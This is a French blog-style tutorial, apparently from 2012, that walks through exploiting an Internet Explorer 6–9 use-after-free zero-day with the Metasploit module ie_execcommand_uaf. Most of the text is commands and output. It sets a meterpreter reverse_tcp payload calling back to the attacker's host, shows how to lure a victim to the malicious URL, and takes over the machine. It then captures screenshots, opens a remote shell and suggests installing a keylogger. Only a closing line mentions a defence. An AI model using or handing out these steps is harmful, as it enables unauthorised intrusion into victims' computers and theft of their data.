Sep 19, 2012
10 Min
Facile

Une nouvelle faille de sécurité vient d’être découverte dans Internet explorer. Il s’agit d’un exploit 0day, qui permet à une personne malveillante de se connecter à une machine distante. Les versions 6 à 9 du navigateur Internet Explorer sont concernés par le problème sauf la version 10 n’est pas touchée.


On se demande combien de temps il va falloir à Microsoft pour proposer un patch, alors que plus de 32 % d’internautes utilisent le navigateur Internet Explorer.

En attendant, nous allons voir comment exploiter cette faille avec Metasploit Framework.

Le module permettant d’exploiter cette faille est connu sous le nom de « ie_execcommand_uaf « .

Voici les commandes à utiliser dans Metasploit (ici : 192.168.1.2 est le serveur du pirate, c-a-d vous) :

 

msf > svn up (pour mise a jour de Metasploit)

msf > use exploit/windows/browser/ie_execcommand_uaf

msf > set payload windows/meterpreter/reverse_tcp

 

Ici, on charge le payload « reverse_tcp ». Ce bout de shellcode sera exécuté sur la machine cible une fois la vulnérabilité exploitée. Une connexion de type TCP inversée sera alors initialisée et vous permettra d’ouvrir une session distante (même à travers un firewall).

msf > set lhost 192.168.1.2

msf > set srvhost 192.168.1.2

msf > set uripath jeux (c’est l’URL utilisé pour l’exploit)

Le module étant correctement configuré, nous pouvons lancer l’attaque :

 

msf >exploit

[*] Started reverse handler on 192.168.1.100:4444

[*] Using URL: http://192.168.1.2:8080/jeux

Un serveur web temporaire est alors démarré. Il faut ensuite envoyer l’adresse de la page http://192.168.1.2:8080/jeux) à une victime. Lorsque celle-ci cliquera sur le lien, Metasploit vous indiquera quelque chose comme ceci :

Il ne nous reste plus qu’à ouvrir une session à distance sur la machine avec la commande :

 

msf > sessions -i 1
[*] Starting interaction with 1

Maintenant vous pouvez faire ce que vous voulez, comme prendre un screenshot du bureau :

meterpreter > use espia
Loading extension espia…success.
meterpreter > screenshot capture.bmp

 

Ou ouvrir une boîte de dialogue MS-DOS :

meterpreter > shell
Process 892 created.
Channel 1 created.
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:Documents and SettingsAhmedDesktop>

Bref on peut vraiment faire ce qu’on veut sur le système (eteindre le pc , mise en place d’un keylogger…).

Pour se protéger de cette faille, télécharger EMET 3.0, un logiciel de sécurité conseillé par microsoft .